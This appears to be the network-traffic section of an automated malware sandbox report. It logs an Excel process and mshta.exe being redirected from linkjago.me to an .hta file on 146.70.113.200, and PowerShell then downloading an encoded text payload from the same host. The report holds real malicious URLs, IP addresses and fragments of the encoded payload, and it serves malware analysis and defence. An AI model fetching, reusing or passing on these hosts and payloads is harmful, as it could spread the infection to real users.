                                                  Dec 2, 2024 07:25:19.749449968 CET1236INData Raw: 70 4d 73 63 67 36 4a 33 55 4c 55 49 45 6d 43 6a 76 54 59 59 4c 72 78 55 69 70 65 4b 6e 66 75 55 6b 72 5a 56 37 41 37 50 42 55 44 78 74 73 38 59 38 70 73 34 64 78 39 79 58 45 59 2f 77 79 44 4b 79 7a 53 63 69 65 67 41 55 43 48 52 56 57 44 57 5a 72
                                                  Data Ascii: pMscg6J3ULUIEmCjvTYYLrxUipeKnfuUkrZV7A7PBUDxts8Y8ps4dx9yXEY/wyDKyzSciegAUCHRVWDWZrGpufitC4S8uopEI6vVXa4ncHAw/KL+9ua5KaWO1rLWXC8uoK3r0fIMHQSiP82zIsecP0EDEtlSTFsCZpWnL1iajJ1C3+18OShU0O3DXim/2hpHMBxmljN0lxw31HliJfN1xTvYbb3w/yVBGsReaQElZjx77L2tKne
                                                  Dec 2, 2024 07:25:19.749577045 CET1236INData Raw: 33 65 49 4b 77 2b 2b 66 50 49 45 6a 78 45 67 73 2f 5a 30 43 54 2f 79 4d 6b 34 36 44 39 46 68 79 48 71 4d 66 39 66 44 6c 68 6e 49 41 4d 74 4a 47 35 51 4e 62 6c 38 55 77 61 52 63 6b 67 30 63 44 41 53 6d 48 77 77 4a 77 74 71 6f 75 6d 57 41 32 76 79
                                                  Data Ascii: 3eIKw++fPIEjxEgs/Z0CT/yMk46D9FhyHqMf9fDlhnIAMtJG5QNbl8UwaRckg0cDASmHwwJwtqoumWA2vyqdjrjcP1pqjZ5rLvkGZvU1qKmrXQ3SYDTnWY90TBEJQ6sY8v75Fsox07U8++XShd5eVSFRp/nZFxKf98oWen8jEU6Eeb9ApICQQuczGMzZ3srlpokKziAv5up1Eqk46T4WMJbVIauNgINNvAniGXsrSHpf+Eb9T7P
                                                  Dec 2, 2024 07:25:19.749589920 CET1236INData Raw: 31 54 36 69 79 49 35 37 2b 66 69 6a 73 4f 75 69 38 54 66 61 71 57 4d 52 4e 62 64 65 6e 6b 50 4a 74 32 34 47 4d 32 33 2f 56 6d 52 4e 49 58 44 2f 39 6c 56 63 32 59 55 49 53 72 71 75 38 76 52 4b 53 56 70 4e 52 74 59 78 75 46 31 47 70 74 57 4d 4a 2b
                                                  Data Ascii: 1T6iyI57+fijsOui8TfaqWMRNbdenkPJt24GM23/VmRNIXD/9lVc2YUISrqu8vRKSVpNRtYxuF1GptWMJ+8wsncsaYvxO6RfuJPJCERxaWmH8EW7lTB5OcHlswaRpzlCTf+vzt92ahdeWzk+jP2zRfwDvbKwGDpPT1etItJ7r85WkSzBlZ4J7yiVfarFtpE0Dr9hxXhPQ2eOWm3xncARxOpJQYfMB99DNF1wfhi5/otNNAu6150
                                                  Dec 2, 2024 07:25:19.749604940 CET1236INData Raw: 63 73 2f 61 69 68 53 34 74 4d 68 38 68 70 54 34 41 6a 42 66 6c 78 4a 57 54 34 2f 58 56 38 55 64 59 32 39 78 53 31 4d 6d 54 7a 4b 42 64 45 4a 78 48 4b 35 37 68 63 5a 6a 63 32 54 67 36 70 43 37 51 4a 64 6f 4b 64 62 68 72 53 43 56 72 56 31 41 67 48
                                                  Data Ascii: cs/aihS4tMh8hpT4AjBflxJWT4/XV8UdY29xS1MmTzKBdEJxHK57hcZjc2Tg6pC7QJdoKdbhrSCVrV1AgHa4Xok+mxGjbWX+7gtKHDsJGgGy0/Vag2AP3UG3t7POr7pb4wzKl3Y0OZjnm29StZ6ucQDllwGkofaqbCEF99R6HHjGxz+cRMZiDoYoEgHIVEAcY1wrsHj2JTLa+H7YcIkIByxCha6GRGDZCv9/8OL51KH8jurCv8f
                                                  Dec 2, 2024 07:25:19.749617100 CET1236INData Raw: 76 4c 41 4d 38 7a 37 6c 52 79 48 69 54 31 66 6e 67 58 6d 30 70 75 77 6e 71 47 58 4b 41 78 64 53 43 59 57 57 31 55 4c 77 61 6c 70 69 56 57 39 75 35 5a 2f 61 73 69 45 72 76 33 45 76 64 37 6b 2f 42 50 34 36 63 33 33 65 4b 4f 63 34 2b 6a 2b 39 62 63
                                                  Data Ascii: vLAM8z7lRyHiT1fngXm0puwnqGXKAxdSCYWW1ULwalpiVW9u5Z/asiErv3Evd7k/BP46c33eKOc4+j+9bcHDeGWnrJuPqncV5XCYPDK1KeaGkzokE/lxLoRckwT5UiJWZve9GlAOWIpX3a4dg78c6CDynIlW3Mbl1dwKXRxtRzrrhBuCsf9p7G96mANzuvUa466I+bJWxibADi3I+0zNBCoQLs1KJ+n1c+576Zc8aQBVtT+f/Kq
                                                  Dec 2, 2024 07:25:19.749785900 CET1000INData Raw: 43 5a 6b 4c 49 75 4b 52 32 58 75 64 55 6a 47 75 6f 62 38 56 48 59 71 6e 39 41 7a 51 39 64 4e 53 4b 4e 51 41 6f 62 37 67 41 58 6b 6f 66 35 77 74 4f 41 46 49 47 57 71 77 73 50 4f 6c 67 37 33 43 35 44 30 6d 36 6e 30 5a 4f 46 38 53 78 48 32 34 73 71
                                                  Data Ascii: CZkLIuKR2XudUjGuob8VHYqn9AzQ9dNSKNQAob7gAXkof5wtOAFIGWqwsPOlg73C5D0m6n0ZOF8SxH24sqYhKCwbsZ8769qHDY3JfIoljly8umcOKQ7JoUFdJUGC5ROfCQRtsgsco5jzkiT70TEcaDyAmhsX8f1YBbUSgZo7jtLpmOEYoOJoxJolQBLNAbNLVoobh/HPe1v6aI26fUXC+W25wCax5htsM+/LTeJ8/HGUDEhPXGv
                                                  Dec 2, 2024 07:25:19.749797106 CET1236INData Raw: 73 31 5a 55 58 4c 67 4e 59 46 56 76 36 2f 61 65 6a 76 2b 38 37 71 69 42 47 4a 52 55 6b 6d 4c 62 6c 55 49 43 6f 30 7a 7a 4f 30 49 30 76 69 70 74 32 42 4e 54 6a 4a 5a 4f 5a 43 74 5a 68 58 4f 45 65 50 4c 65 63 57 31 67 34 55 4d 43 66 33 55 45 2f 4c
                                                  Data Ascii: s1ZUXLgNYFVv6/aejv+87qiBGJRUkmLblUICo0zzO0I0vipt2BNTjJZOZCtZhXOEePLecW1g4UMCf3UE/LTknem/bQV/MslZl7x0FBZHFhBY3O9nSNnxjEmB3rEAR37rQfSN151cB6i7YFWOzR40ENsCZBlaqGiu/KnBDWuoFtBX8gWySxXOcGJ5B8rwdZC0vZp5t4I7OMHlIDVGnAEV2wEIcTJRuAY2PKjJrrWKxcOmbA9l+u6
                                                  Dec 2, 2024 07:25:19.749806881 CET1236INData Raw: 62 75 44 35 4f 64 70 31 71 6f 49 58 45 77 6b 76 32 4c 38 33 4a 61 32 4d 4f 31 4b 76 2b 4e 75 72 52 6c 76 67 6d 50 75 55 50 46 69 62 79 73 42 69 4a 33 66 72 71 51 6b 75 61 52 4b 4e 79 78 6d 74 61 46 70 2f 50 78 49 64 32 52 57 6a 4b 44 55 38 68 6f
                                                  Data Ascii: buD5Odp1qoIXEwkv2L83Ja2MO1Kv+NurRlvgmPuUPFibysBiJ3frqQkuaRKNyxmtaFp/PxId2RWjKDU8hoIXiSRIAL4KcQfG7o5YMwu0UFA2vyz7zQ4ZySoQ/iRsxHvAFMmTfjmuLgrEkny1nflEBgiZTLMkbijRjNcJIqQQDhmkF33bQ7pPXWm1ojgoBnnxhb9Pk96KwZXIglif9kBIFUdkiqte9A0pZ+CPHL0nJ9GOh7ZXTs6
                                                  Dec 2, 2024 07:25:19.869589090 CET1236INData Raw: 5a 52 35 4f 58 45 74 4f 76 36 38 41 73 70 34 53 71 6c 79 4a 38 77 79 4e 63 6d 36 41 55 4e 6b 31 2b 77 32 6d 45 44 62 2f 6a 4e 74 6c 31 6e 42 38 55 35 77 51 45 6e 37 65 69 42 42 52 36 63 33 49 56 4b 70 49 76 4f 51 41 50 56 2b 65 76 6d 2b 55 45 4a
                                                  Data Ascii: ZR5OXEtOv68Asp4SqlyJ8wyNcm6AUNk1+w2mEDb/jNtl1nB8U5wQEn7eiBBR6c3IVKpIvOQAPV+evm+UEJzHiGt7+xZcn9mt78hGz4GHg0mamwJonzetnkoNRArD4ygfP49UG2vIXHcEUfdSRMIxWLvhGHDvgXyTGouoQbvbwYTV5QyM07CR50i+IqwngfegxUIlgWsTGIYPGhmYe7hP9R5j9Wcnr1fjxbnfOnemGJZmPuvcbnL


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.2249174146.70.113.200803512C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 2, 2024 07:25:33.524817944 CET79OUTGET /231/ZAHHRZA.txt HTTP/1.1
                                                  Host: 146.70.113.200
                                                  Connection: Keep-Alive
                                                  Dec 2, 2024 07:25:35.107614994 CET1236INHTTP/1.1 200 OK
                                                  Date: Mon, 02 Dec 2024 06:25:34 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                  Last-Modified: Mon, 02 Dec 2024 02:12:20 GMT
                                                  ETag: "5daac-628401412802e"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 383660
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: text/plain
                                                  Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                  Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                  Dec 2, 2024 07:25:35.107690096 CET1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEpp7KS2WZxCJ329lGN4VweCLUFW/Wh4luoNd1e5v2hr6Qkz0qTLRVkqBd8KF3WWrSLtEwm4IX7bs4m0
                                                  Dec 2, 2024 07:25:35.107705116 CET448INData Raw: 70 4d 73 63 67 36 4a 33 55 4c 55 49 45 6d 43 6a 76 54 59 59 4c 72 78 55 69 70 65 4b 6e 66 75 55 6b 72 5a 56 37 41 37 50 42 55 44 78 74 73 38 59 38 70 73 34 64 78 39 79 58 45 59 2f 77 79 44 4b 79 7a 53 63 69 65 67 41 55 43 48 52 56 57 44 57 5a 72
                                                  Data Ascii: pMscg6J3ULUIEmCjvTYYLrxUipeKnfuUkrZV7A7PBUDxts8Y8ps4dx9yXEY/wyDKyzSciegAUCHRVWDWZrGpufitC4S8uopEI6vVXa4ncHAw/KL+9ua5KaWO1rLWXC8uoK3r0fIMHQSiP82zIsecP0EDEtlSTFsCZpWnL1iajJ1C3+18OShU0O3DXim/2hpHMBxmljN0lxw31HliJfN1xTvYbb3w/yVBGsReaQElZjx77L2tKne
                                                  Dec 2, 2024 07:25:35.107733965 CET1236INData Raw: 49 67 72 45 50 4b 42 65 77 4a 56 7a 64 47 57 69 30 2b 4d 41 45 4b 70 44 33 33 62 51 68 2f 43 42 6c 53 43 2f 32 46 78 46 7a 59 55 2b 36 44 6b 43 6b 7a 71 76 61 41 51 68 70 41 67 6a 62 46 4d 67 39 39 78 33 55 46 62 48 78 6e 70 69 53 4f 2f 2b 4b 2b
                                                  Data Ascii: IgrEPKBewJVzdGWi0+MAEKpD33bQh/CBlSC/2FxFzYU+6DkCkzqvaAQhpAgjbFMg99x3UFbHxnpiSO/+K+VwntI+7j+4aWrLlCoajHhGyJky/ww3iehPJz01dSYWvhIttlW+zU7AeuIMKuA66I1NC2CBUy0LF1sVb3gohfIOHJQa2AwQrGzpgT5XYD6EWPFwR7jkU82ycCILfCnL5w60rktljTAL5TWCjcFc5JKgOS6nXP9wkPJ
                                                  Dec 2, 2024 07:25:35.107744932 CET1236INData Raw: 74 4d 72 77 59 58 36 33 65 63 6b 79 37 42 4b 31 78 42 79 36 54 48 4d 41 61 4e 6e 67 71 2f 71 56 79 35 4c 58 71 55 74 33 6a 6c 73 2b 7a 69 68 45 34 42 7a 67 32 67 56 42 38 69 4e 53 57 71 2b 62 4a 67 50 69 4d 56 76 4a 66 78 54 4f 45 6d 68 68 2f 6a
                                                  Data Ascii: tMrwYX63ecky7BK1xBy6THMAaNngq/qVy5LXqUt3jls+zihE4Bzg2gVB8iNSWq+bJgPiMVvJfxTOEmhh/japu2bWUkpnx900AKDUYKMrpw667XnUvynIGmmkahlDD5B+dpWFZsEnh5oKJKaHIhNVgCJSgoyX4nHiRr9f/+ZDIimT8RINqnVoIGMOVV1CsTt/HWmPDNDJUNJ/ThcR1qPbsJ9T31YVy0TmTZj7dafuUEt23hb7idl
                                                  Dec 2, 2024 07:25:35.107887030 CET1236INData Raw: 75 46 71 70 2b 72 58 4b 4b 72 48 38 41 30 35 2b 46 52 6b 61 35 50 2b 41 51 78 51 6d 31 5a 49 48 77 6f 6e 43 63 5a 66 54 75 6a 55 4c 32 77 75 33 68 64 61 2b 41 64 44 49 45 73 39 44 4f 57 38 56 77 7a 55 34 6c 75 75 54 32 56 6b 63 56 4b 6e 4a 74 36
                                                  Data Ascii: uFqp+rXKKrH8A05+FRka5P+AQxQm1ZIHwonCcZfTujUL2wu3hda+AdDIEs9DOW8VwzU4luuT2VkcVKnJt65Yp2sJEQWhLQS+Tp/sWRHJCcBK3Xqlmuxgh1Sf/0OeN846mGYu18LzN7+zBSEeN7+aFDyNS2gHBxvj3C8PGUMRXaszU1aQ3hT1k5opQh/fH2VFtuLTwbBClRzRbES9/r46RDyAzPidZ/6idSqQuCKhlCHh7VIOd58
                                                  Dec 2, 2024 07:25:35.107897043 CET1236INData Raw: 67 65 42 6f 4c 70 4b 64 70 64 6c 36 46 4b 48 78 57 59 62 74 62 5a 57 55 4d 4f 32 42 74 51 77 44 6b 75 4e 6c 76 61 7a 78 74 73 67 4a 6b 31 33 42 49 2f 31 53 61 4e 61 67 63 53 51 36 6e 36 7a 34 71 69 48 51 70 45 66 42 72 67 6d 4d 5a 45 42 36 6c 57
                                                  Data Ascii: geBoLpKdpdl6FKHxWYbtbZWUMO2BtQwDkuNlvazxtsgJk13BI/1SaNagcSQ6n6z4qiHQpEfBrgmMZEB6lWnqTRbAP1LN7bVkqw7QKGKRtta9a92IJRRNq0mtq4tH5llecA7DWxmklcxQ8F+R3slTThxO6LK8HHFDh7rcZ5KyMdaBnXe913VaYxaE5q8THq9U2NnogLGiNxP7+G/8BMuFs3u0fHZSmWQfqipIdVkxPRvGwgkteAw
                                                  Dec 2, 2024 07:25:35.107908010 CET1236INData Raw: 6d 65 33 71 72 31 4a 52 73 74 4b 2b 69 62 48 55 70 77 64 6a 63 30 6d 62 58 77 76 65 4e 66 63 47 7a 61 2b 56 7a 4b 31 35 6f 4e 32 46 70 57 44 61 73 70 63 6f 55 71 36 67 76 56 33 46 61 6c 4d 32 32 65 77 39 46 53 38 2f 6a 72 4e 32 44 6e 71 59 38 75
                                                  Data Ascii: me3qr1JRstK+ibHUpwdjc0mbXwveNfcGza+VzK15oN2FpWDaspcoUq6gvV3FalM22ew9FS8/jrN2DnqY8uPVuXkQ/RvoGWXvdlkulz7qXfmlS9GpRAfZwcnfU/gSFnCpveacFQpj/STySIdrqOKFw0Q+y3LOAWAtqNcspAVLv8ffkLwIapFBvmikqR/NGzon9mDWl7TmsEPyZnCJ6BpnoNHieyhGRJP9+a+y+ZflO0heRAFvX/2
                                                  Dec 2, 2024 07:25:35.108187914 CET1236INData Raw: 77 62 64 57 34 63 42 63 69 33 37 71 32 6c 4d 36 65 51 6d 42 65 38 74 32 6f 49 64 69 50 71 55 4f 78 67 76 69 30 4a 32 46 36 6b 31 70 48 46 39 2b 57 6e 62 65 57 72 7a 31 39 66 56 6c 48 62 53 44 4a 4e 6d 71 65 56 64 4c 36 6d 72 42 75 44 56 78 56 4b
                                                  Data Ascii: wbdW4cBci37q2lM6eQmBe8t2oIdiPqUOxgvi0J2F6k1pHF9+WnbeWrz19fVlHbSDJNmqeVdL6mrBuDVxVKMrAZFmW10Stcxuq3nUNbghWBvdWd+MuDwsbxcopwTS8hZvC5lU27CErb5MIHGlFeQMAvMosJn/hudTa5huwssm1eMIvv61JTfil6xotFWtlUrSuRLyIp6pBrFB/M1QrmWkKWpTm5OOUc2E4G8rg5hzDT30LIT86Mh
                                                  Dec 2, 2024 07:25:35.108197927 CET1236INData Raw: 2b 4a 64 4e 39 4c 6c 71 51 4f 59 49 48 74 55 75 78 7a 2b 4c 73 64 6e 42 58 75 53 6f 4a 73 2f 36 75 44 69 65 45 42 50 4d 51 6f 66 66 50 54 37 41 6d 30 55 51 78 6e 4c 2b 43 6e 4f 76 75 64 49 6e 35 4b 52 78 4a 52 6b 77 67 52 39 79 48 71 41 61 46 58
                                                  Data Ascii: +JdN9LlqQOYIHtUuxz+LsdnBXuSoJs/6uDieEBPMQoffPT7Am0UQxnL+CnOvudIn5KRxJRkwgR9yHqAaFXNW9I7oCmfyhMdM0s7R9UdKA8SK1T9Du3M8+xSpd74TO4gg1hrgTx/R7U/ykUSyUSEMs/etgNoLw4IovWi7Yc46IY+PjjbgWT4fjuBLWr/n8hO63cq4IoBdKfatRrItlKqUYcfkyy8n1o8IcnIz5JlYFujoNqIA+CI
                                                  Dec 2, 2024 07:25:35.228010893 CET1236INData Raw: 76 6f 6e 68 78 56 64 59 62 39 59 2f 71 47 63 67 51 6b 66 66 74 65 77 77 63 57 75 74 4d 75 76 51 67 67 4c 2b 57 6a 6f 59 39 47 75 42 56 44 67 64 6c 51 73 50 42 51 33 31 44 33 71 64 2b 74 4a 70 70 6e 2f 51 76 45 4d 58 78 6f 55 69 4d 61 4a 4a 78 45
                                                  Data Ascii: vonhxVdYb9Y/qGcgQkfftewwcWutMuvQggL+WjoY9GuBVDgdlQsPBQ31D3qd+tJppn/QvEMXxoUiMaJJxEA67C0tg7bKZWY4Uw9vOE9aGU1TsGnLpg9VSD7+RDCPY6EGsGl9bndIWKMkJxj/xfoeZxX4wj3RBGe/NV2HMAjtzLFwv6GboMfRZAVEpkif/4xnnjVcmYBqrACNG30OftaLZvmJRlzgjpEWcdSoU3XEzLnCye3vTO3


                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.2249161188.114.96.64433392C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-02 06:24:34 UTC402OUTGET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: linkjago.me
                                                  Connection: Keep-Alive
                                                  2024-12-02 06:24:35 UTC1200INHTTP/1.1 302 Found
                                                  Date: Mon, 02 Dec 2024 06:24:35 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 82
                                                  Connection: close
                                                  cross-origin-embedder-policy: require-corp
                                                  cross-origin-opener-policy: same-origin
                                                  cross-origin-resource-policy: same-origin
                                                  x-dns-prefetch-control: off
                                                  x-frame-options: SAMEORIGIN
                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                  x-download-options: noopen
                                                  x-content-type-options: nosniff
                                                  origin-agent-cluster: ?1
                                                  x-permitted-cross-domain-policies: none
                                                  referrer-policy: no-referrer
                                                  x-xss-protection: 0
                                                  location: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta
                                                  vary: Accept, Accept-Encoding
                                                  x-do-app-origin: 4d89fdb9-9ba1-426a-ad91-7dcdf1d2a676
                                                  Cache-Control: private
                                                  x-do-orig-status: 302
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JFbck8h0Ykcp7n5miexzSeGzdY0tE%2BfZ4zdOt5erAsZFO3oMTqFYac3eVk57lhSTKZ0Fr2ZUJzwBau1zfvggUKZJqPOHEvIh%2FfNX78XJT57eR%2BhH5GFIk8XULibgDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8eb93c17c9e0185d-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-02 06:24:35 UTC216INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 36 33 36 26 6d 69 6e 5f 72 74 74 3d 31 36 33 31 26 72 74 74 5f 76 61 72 3d 36 32 31 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 31 26 72 65 63 76 5f 62 79 74 65 73 3d 39 38 34 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 37 34 37 34 35 36 26 63 77 6e 64 3d 32 33 36 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 30 64 66 61 63 62 38 64 30 62 65 63 36 64 31 62 26 74 73 3d 31 32 31 38 26 78 3d 30 22 0d 0a 0d 0a
                                                  Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1631&rtt_var=621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2811&recv_bytes=984&delivery_rate=1747456&cwnd=236&unsent_bytes=0&cid=0dfacb8d0bec6d1b&ts=1218&x=0"
                                                  2024-12-02 06:24:35 UTC82INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 34 36 2e 37 30 2e 31 31 33 2e 32 30 30 2f 32 33 31 2f 64 6e 76 2f 73 65 65 6d 65 62 65 73 74 74 68 69 6e 67 73 67 69 76 65 6e 6d 65 67 6f 6f 64 2e 68 74 61
                                                  Data Ascii: Found. Redirecting to http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  1192.168.2.2249163188.114.97.64433684C:\Windows\System32\mshta.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-02 06:24:39 UTC426OUTGET /RHCYXp?&damage=nasty%20&briefs=momentous&highlight=delicious&middleman=magenta&spank HTTP/1.1
                                                  Accept: */*
                                                  Accept-Language: fr-FR
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                  Host: linkjago.me
                                                  Connection: Keep-Alive
                                                  2024-12-02 06:24:40 UTC1198INHTTP/1.1 302 Found
                                                  Date: Mon, 02 Dec 2024 06:24:40 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 82
                                                  Connection: close
                                                  cross-origin-embedder-policy: require-corp
                                                  cross-origin-opener-policy: same-origin
                                                  cross-origin-resource-policy: same-origin
                                                  x-dns-prefetch-control: off
                                                  x-frame-options: SAMEORIGIN
                                                  strict-transport-security: max-age=15552000; includeSubDomains
                                                  x-download-options: noopen
                                                  x-content-type-options: nosniff
                                                  origin-agent-cluster: ?1
                                                  x-permitted-cross-domain-policies: none
                                                  referrer-policy: no-referrer
                                                  x-xss-protection: 0
                                                  location: http://146.70.113.200/231/dnv/seemebestthingsgivenmegood.hta
                                                  vary: Accept, Accept-Encoding
                                                  x-do-app-origin: 4d89fdb9-9ba1-426a-ad91-7dcdf1d2a676
                                                  Cache-Control: private
                                                  x-do-orig-status: 302
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uzPKLtu9FVXOSSlxfy0qXFXAnpYZLUQPOQfZHcBFnNxsfs3sL3yxl9y35b3Quj8q6cA5kFMA3hd4wKqrc%2B6GcnbSfWXOVd7v%2FmWom8AjWBAkl4hpXIpHiA9mEoOn3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8eb93c398d4917a9-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-02 06:24:40 UTC216INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 36 30 30 26 6d 69 6e 5f 72 74 74 3d 31 34 39 36 26 72 74 74 5f 76 61 72 3d 36 33 35 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 30 26 72 65 63 76 5f 62 79 74 65 73 3d 31 30 30 38 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 39 35 31 38 37 31 26 63 77 6e 64 3d 32 33 38 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 34 35 33 36 36 37 31 31 39 35 39 35 37 35 66 34 26 74 73 3d 37 33 34 26 78 3d 30 22 0d 0a 0d 0a
                                                  Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1496&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2810&recv_bytes=1008&delivery_rate=1951871&cwnd=238&unsent_bytes=0&cid=45366711959575f4&ts=734&x=0"
